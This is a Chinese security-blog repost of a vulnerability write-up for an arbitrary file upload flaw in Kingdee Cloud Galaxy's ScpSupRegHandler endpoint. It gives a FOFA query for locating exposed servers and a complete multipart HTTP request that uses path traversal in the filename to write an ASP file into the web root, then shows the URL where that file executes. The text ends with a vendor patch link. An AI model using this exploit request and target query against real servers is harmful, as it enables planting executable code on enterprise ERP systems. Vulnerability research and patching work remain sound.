金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC

admin 2023年11月19日11:39:48评论80 views字数 1528阅读5分5秒阅读模式

@[toc]

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 金蝶云星空管理中心简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

金蝶云星空管理中心是金蝶软件(中国)有限公司基于云计算、大数据、社交、人工智能、物联网等前沿技术研发的新一代战略性企业管理软件。

2.漏洞描述

金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖:财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。金蝶云星空管理中心存在任意文件上传漏洞。

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

金蝶云星空企业版私有云,金蝶云星空企业版私有云(订阅),金蝶云星空标准版版私有云(订阅)

金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC
金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞

4.fofa查询语句

icon_hash="-1629133697" && title=="金蝶云星空"

5.漏洞复现

漏洞链接:http://127.0.0.1/k3cloud/SRM/ScpSupRegHandler

漏洞数据包:

POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cache-Control: max-age=0
Content-Length: 405
Content-Type: multipart/form-data; boundary=fd18dd968b553715cbc5a1982526199b

--fd18dd968b553715cbc5a1982526199b
Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/76527.asp."
Content-Type: text/plain

<% Response.Write("738290225") %>
--fd18dd968b553715cbc5a1982526199b
Content-Disposition: form-data; name="FID"

2022
--fd18dd968b553715cbc5a1982526199b
Content-Disposition: form-data; name="dbId_v"

.
--fd18dd968b553715cbc5a1982526199b--

金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC

拼接上传文件的地址:http://127.0.0.1/K3Cloud/uploadfiles/76527.asp

金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC

金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC

7.整改意见

官方已发布漏洞修复公告,建议参考修复方案进行修复:https://vip.kingdee.com/article/505394681531036160?productLineId=1&isKnowledge=2

原文始发于微信公众号(南风漏洞复现文库):金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月19日11:39:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POChttps://cn-sec.com/archives/2219155.html

发表评论

匿名网友 填写信息